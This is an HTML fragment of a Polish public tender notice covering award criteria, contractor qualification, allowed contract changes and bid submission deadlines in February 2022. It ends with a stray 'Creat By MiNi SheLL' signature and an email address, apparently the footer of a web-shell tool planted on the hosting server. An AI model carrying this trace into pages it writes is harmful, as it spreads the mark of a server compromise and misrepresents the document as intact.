class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, wzór stanowi<br/>Załącznik nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje i zastrzega sobie prawo wprowadzenia zmian w treści umowy<br/>w zakresie uregulowanym w Art. 454 – 455 ustawy Pzp.<br/>2. Dopuszczalne są zmiany umowy bez przeprowadzania nowego postępowania o<br/>udzielenie zamówienia zgodnie z Art. 455 ust. 1 ustawy Pzp.<br/>3. Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej<br/>umowie, w niżej wymienionych (uzasadnionych) przypadkach:<br/>a) ustawowej zmiany stawki podatku VAT – zmiana wynagrodzenia brutto Wykonawcy.<br/>Zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian;<br/>b) zmiany ceny jednostkowej produktu. Zmiana ta może nastąpić nie częściej niż dwa razy w<br/>roku i dotyczy tylko tych produktów, których cena rynkowa znacznie przewyższy cenę<br/>produktu zaoferowaną w Formularzu asortymentowo – cenowym – Załącznik nr 2 do<br/>Umowy. Zmiana może być zaakceptowana w wysokości nie wyższej niż o wskaźnik cen<br/>towarów i usług konsumpcyjnych za poprzedni kwartał ogłaszany przez Prezesa GUS na<br/>stronie Głównego Urzędu Statystycznego oraz publikowany w Monitorze Polskim (tzw.<br/>klauzula waloryzacyjna). W takim przypadku cena zostanie zmieniona z pierwszym dniem<br/>miesiąca następującego po miesiącu, w którym złożono pismo wnioskujące o zmianę –<br/>zmiana wynagrodzenia brutto Wykonawcy;<br/>c) zmiany numeru rachunku bankowego;<br/><br/>d) zmiany nazwy oraz formy prawnej Stron;<br/>e) dotyczących wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki<br/>przedmiotu umowy. W takiej sytuacji Wykonawca może zaproponować produkt tożsamy<br/>spełniający warunki określone w SWZ oraz za cenę określoną w ofercie i umowie;<br/>f) zmiany miejsca dostawy, w przypadku zmian organizacyjnych Zamawiającego;<br/>g) innych niż wskazane w punkcie a) – f), gdy zachodzi konieczność ich wprowadzenia z<br/>powodu okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.<br/>4. Dokonanie zmiany treści Umowy wymaga uprzednio złożenia na piśmie drugiej Stronie<br/>wniosku wskazującego zasadność wprowadzenia zmian i zgody Strony na jej dokonanie.<br/>Wniosek, o którym mowa powyżej winien zawierać w szczególności:<br/>a) pozycję (zakres) zmiany<br/>b) opis okoliczności faktycznych uprawniających do dokonania zmiany<br/>c) podstawę dokonania zmiany<br/>d) informację lub dowody potwierdzające, że zostały spełnione okoliczności<br/>uzasadniające dokonanie zmiany.<br/>5. Wszelkie zmiany treści umowy wymagają – pod rygorem nieważności zachowania<br/>formy pisemnej w postaci aneksu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-18 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-18 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej i opatrzona<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Oznacza to, że do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do<br/>reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub<br/>podpisu zaufanego.<br/>2. Jeżeli na ofertę składa się kilka dokumentów, Wykonawca załącza je odpowiednio do opisu<br/>na Platformie w folderze Instrukcje dla Wykonawcy.<br/>3. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2019 r. poz. 1010), które<br/>Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone zgodnie z<br/>opisem na Platformie w folderze Instrukcje dla Wykonawcy. Wykonawca zobowiązany jest, wraz<br/>z przekazaniem tych informacji, wykazać spełnienie przesłanek określonych w art. 11 ust. 2<br/>ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby<br/>uzasadnienie zastrzeżenia informacji jako tajemnicy przedsiębiorstwa było sformułowane w<br/>sposób umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę tajemnicy<br/>przedsiębiorstwa bez uzasadnienia, będzie traktowane przez Zamawiającego jako bezskuteczne<br/>ze względu na zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu zachowania<br/>poufności objętych klauzulą informacji zgodnie z postanowieniami art. 18 ust. 3 pzp.<br/>4. Do przygotowania oferty zaleca się wykorzystanie Formularza Oferty, którego wzór stanowi<br/>Załącznik nr 1 do SWZ. W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez<br/>Zamawiającego wzoru, w treści oferty należy zamieścić wszystkie informacje wymagane w<br/>Formularzu Oferty.<br/>Pozostałe informacje zawarto w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com